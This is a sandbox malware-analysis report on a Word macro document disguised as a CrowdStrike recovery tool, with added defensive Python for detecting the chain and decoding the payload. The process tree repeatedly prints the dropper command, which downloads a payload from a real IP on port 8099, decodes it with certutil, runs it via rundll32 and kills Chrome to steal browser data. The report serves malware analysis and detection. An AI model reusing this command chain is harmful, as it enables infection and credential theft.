

Windows Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Overview

General Information

Sample name: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Analysis ID: 1478411
MD5: dd2100dfa067caae416b885637adc4ef
SHA1: 499f8881f4927e7b4a1a0448f62c60741ea6d44b
SHA256: 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61
Tags: docm

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contains functionality to steal Chrome passwords or cookies
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 2156 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 3916 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xcopy.exe (PID: 5308 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
      • certutil.exe (PID: 2496 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • certutil.exe (PID: 3552 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • curl.exe (PID: 2784 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • certutil.exe (PID: 2496 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • rundll32.exe (PID: 5068 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 3992 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 5640 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 2144 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • chrome.exe (PID: 7612 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1976,i,14189460158267219968,9438605418759963760,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 2716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • WINWORD.EXE (PID: 3856 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • cmd.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xcopy.exe (PID: 7500 cmdline: xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp MD5: 7E9B7CE496D09F70C072930940F9F02C)
      • certutil.exe (PID: 7576 cmdline: certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • certutil.exe (PID: 4820 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • curl.exe (PID: 8092 cmdline: C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • certutil.exe (PID: 8116 cmdline: certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll MD5: 0DDA4F16AE041578B4E250AE12E06EB1)
      • rundll32.exe (PID: 5208 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: 889B99C52A60DD49227C5E485A016679)
        • rundll32.exe (PID: 5940 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain MD5: EF3179D498793BF4234F708D3BE28633)
          • cmd.exe (PID: 2540 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 5680 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: File created | Author: frack113, Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\certutil.exe, ProcessId: 3552, TargetFilename: C:\Users\user\AppData\Local\Temp\curl.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2156, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe &
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 2156, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe &
Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 2156, TargetFilename: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
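The process tree above and the Sigma matches in this section describe one chain: WINWORD.EXE spawns cmd.exe, which copies the built-in curl.exe out of System32 into %TEMP%, round-trips it through certutil -encode / -decode, fetches payload2.txt from 172.104.160.126:8099, decodes that with certutil into mscorsvc.dll, and starts it with rundll32 ...,DllMain; the DLL then runs taskkill /F /IM chrome.exe. The Python below is an added example, not Joe Sandbox output and not one of the Sigma rules the report cites, that applies the same logic to process-creation events. The event format (one event per line, |-separated key=value columns, CommandLine always last) is constructed; the PIDs and command lines are copied from the report, the image paths of the 32-bit xcopy.exe, certutil.exe and rundll32.exe children are assumed to be the SysWOW64 copies (the report records SysWOW64 for cmd.exe and certutil.exe), the cmd.exe command line is abridged (its del steps omitted), and the last two events are constructed benign controls.

```python
"""Added example: flag the Office -> cmd -> xcopy/certutil/curl/rundll32 chain in process-creation events."""
import re
from dataclasses import dataclass

# Constructed event format, Sysmon Event ID 1 style: one event per line, '|'-separated
# key=value columns, CommandLine last. PIDs and command lines come from the report's
# process tree; SysWOW64 paths for xcopy/certutil/rundll32 are ASSUMED; the cmd.exe line
# is abridged (del steps dropped); the last two events are constructed benign controls.
SAMPLE_EVENTS = r"""
ProcessId=3916|Image=C:\Windows\SysWOW64\cmd.exe|ParentImage=C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE|CommandLine=C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
ProcessId=5308|Image=C:\Windows\SysWOW64\xcopy.exe|ParentImage=C:\Windows\SysWOW64\cmd.exe|CommandLine=xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
ProcessId=2496|Image=C:\Windows\SysWOW64\certutil.exe|ParentImage=C:\Windows\SysWOW64\cmd.exe|CommandLine=certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
ProcessId=3552|Image=C:\Windows\SysWOW64\certutil.exe|ParentImage=C:\Windows\SysWOW64\cmd.exe|CommandLine=certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
ProcessId=2784|Image=C:\Users\user\AppData\Local\Temp\curl.exe|ParentImage=C:\Windows\SysWOW64\cmd.exe|CommandLine=C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
ProcessId=2496|Image=C:\Windows\SysWOW64\certutil.exe|ParentImage=C:\Windows\SysWOW64\cmd.exe|CommandLine=certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
ProcessId=5068|Image=C:\Windows\SysWOW64\rundll32.exe|ParentImage=C:\Windows\SysWOW64\cmd.exe|CommandLine=rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
ProcessId=2144|Image=C:\Windows\System32\taskkill.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=taskkill /F /IM chrome.exe
ProcessId=7612|Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Windows\explorer.exe|CommandLine="C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
ProcessId=4242|Image=C:\Windows\System32\curl.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=curl https://example.invalid/notes.txt -o C:\Users\user\Downloads\notes.txt
"""

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
LOLBINS = {"cmd.exe", "certutil.exe", "curl.exe", "rundll32.exe", "xcopy.exe", "powershell.exe",
           "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe", "bitsadmin.exe"}
# All matching is done on lower-cased strings, so the patterns are lower-case too.
USER_WRITABLE = re.compile(r"\\appdata\\local\\temp\b|\\users\\public\b|\\downloads\b|\\programdata\b")
IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::(\d+))?/")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass
class ProcEvent:
    pid: int
    image: str
    parent_image: str
    cmdline: str


def parse_event(line: str) -> ProcEvent:
    fields = dict(col.split("=", 1) for col in line.split("|"))
    return ProcEvent(int(fields["ProcessId"]), fields["Image"], fields["ParentImage"], fields["CommandLine"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Names of the rules one event trips; empty for benign events."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.cmdline.lower()
    hits = []
    if parent in OFFICE_APPS and img in LOLBINS:
        hits.append("office_spawns_lolbin")
    if img == "cmd.exe" and all(tool in cl for tool in ("certutil", "curl", "rundll32")):
        hits.append("lolbin_chain_in_one_cmdline")
    if re.search(r"\b(x?copy|robocopy)\b", cl) and "\\windows\\system32\\" in cl and USER_WRITABLE.search(cl):
        hits.append("copy_from_system32_to_user_dir")        # the xcopy of curl.exe into %TEMP%
    if img == "certutil.exe" and re.search(r"\s-(encode|decode|decodehex)\b", cl):
        hits.append("certutil_encode_or_decode")             # certutil used as a transcoder, not a cert tool
    if img == "curl.exe" and not ev.image.lower().startswith(SYSTEM_DIRS):
        hits.append("curl_running_outside_system_dir")       # a copied curl.exe, not the one Windows ships
    m = IP_URL.search(cl)
    if img == "curl.exe" and m and m.group(1) not in (None, "80", "443"):
        hits.append("curl_fetch_from_raw_ip_nonstandard_port")
    if img == "rundll32.exe" and ".dll" in cl and USER_WRITABLE.search(cl):
        hits.append("rundll32_loads_dll_from_user_dir")
    if img == "taskkill.exe" and "/im" in cl and re.search(r"\b(chrome|msedge|firefox)\.exe", cl):
        hits.append("browser_process_killed")                # frees the browser's locked credential/cookie DBs
    return hits


def scan(events_text: str) -> list[tuple[int, str, list[str]]]:
    """(pid, image basename, rule hits) for every event that tripped at least one rule."""
    out = []
    for line in events_text.strip().splitlines():
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            out.append((ev.pid, basename(ev.image), hits))
    return out


def triggered_rules(events_text: str) -> set[str]:
    return {h for _, _, hits in scan(events_text) for h in hits}


# Independent stages that together distinguish the reported chain from a lone LOLBin use.
CHAIN_RULES = {"office_spawns_lolbin", "certutil_encode_or_decode",
               "curl_fetch_from_raw_ip_nonstandard_port", "rundll32_loads_dll_from_user_dir"}


def chain_seen(events_text: str) -> bool:
    return CHAIN_RULES <= triggered_rules(events_text)


if __name__ == "__main__":
    for pid, img, hits in scan(SAMPLE_EVENTS):
        print(f"{pid:>5} {img:<14} {', '.join(hits)}")
    print("reported chain seen:", chain_seen(SAMPLE_EVENTS))
```

Each rule on its own is noisy (administrators do copy files out of System32 and run certutil -decode); the point of chain_seen is to require several stages before raising the severity, while the per-event hits remain available as context. Note that the certutil encode/decode of curl.exe yields a byte-identical copy with a new path and a fresh file-creation event from certutil.exe, which is exactly what the "Legitimate Application Dropped Executable" Sigma match above records.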
No Snort rule has matched
Timestamp: 2024-07-22T15:58:45.771195+0200
SID: 2029280
Source Port: 8099
Destination Port: 49195
Protocol: TCP
Classtype: A Network Trojan was detected
Timestamp: 2024-07-22T15:57:48.044440+0200
SID: 2029280
Source Port: 8099
Destination Port: 49717
Protocol: TCP
Classtype: A Network Trojan was detected
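Both alerts fire on the server side of the port 8099 connection, i.e. on the response that carried payload2.txt. Because the chain saves that body with curl and only then runs certutil -f -decode on it to produce mscorsvc.dll, what is in the capture is the DLL in certutil's text encoding, not a PE. The Python below is an added example, not part of the report, that reproduces the layout certutil -encode writes (BEGIN/END CERTIFICATE lines, base64 in 64-character lines, CRLF line ends), decodes such a file back to bytes while also accepting headerless base64, and then sanity-checks the result for a PE header and hashes it so it can be compared against the dropped-file hashes. The sample input is a constructed stand-in (a DOS header plus a PE signature), not the real mscorsvc.dll.

```python
"""Added example: decode a certutil -encode text file back into the binary it carries."""
import base64
import hashlib
import struct

PEM_BEGIN = b"-----BEGIN CERTIFICATE-----"
PEM_END = b"-----END CERTIFICATE-----"


def certutil_encode(data: bytes) -> bytes:
    """Lay data out the way certutil -encode does: CERTIFICATE header/footer, 64-char base64 lines, CRLF."""
    b64 = base64.b64encode(data)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return b"\r\n".join([PEM_BEGIN, *lines, PEM_END]) + b"\r\n"


def certutil_decode(text: bytes) -> bytes:
    """Invert certutil_encode. Header/footer and blank lines are skipped, so plain base64 works too.
    validate=True makes stray bytes (for example an HTML error page saved as payload2.txt) raise
    binascii.Error instead of silently producing garbage."""
    body = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith(b"-----"):
            body.append(line)
    return base64.b64decode(b"".join(body), validate=True)


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE sanity check: 'MZ' DOS header and a 'PE\\0\\0' signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover(encoded: bytes) -> dict:
    """Decode a captured payload2.txt-style body and report what came out."""
    data = certutil_decode(encoded)
    return {"size": len(data), "is_pe": looks_like_pe(data),
            "sha256": hashlib.sha256(data).hexdigest()}


# Constructed stand-in for the downloaded DLL: DOS header with e_lfanew = 0x80 followed by a PE
# signature and an x64 machine field. Not a real or loadable PE; it only gives the round trip
# something PE-shaped to check.
FAKE_DLL = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x80) + b"\0" * 0x40
            + b"PE\0\0" + b"\x64\x86" + b"\0" * 200)

if __name__ == "__main__":
    wire = certutil_encode(FAKE_DLL)     # what curl would have written to mscorsvc.txt
    print(wire.decode()[:120])
    print(recover(wire))
```

Run against the HTTP body extracted from the pcap, recover() gives the size and SHA-256 of the decoded file; a mismatch with the hash of the dropped mscorsvc.dll, or is_pe being False, means the capture is incomplete or the server returned something other than the stage the sandbox received.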


AV Detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRC0000.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AF02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AF820 CryptAcquireContextA,CryptCreateHash,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AF860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008A6400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AEC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008A6591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008A3EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AC6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AC730 CryptHashData,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008AC750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,
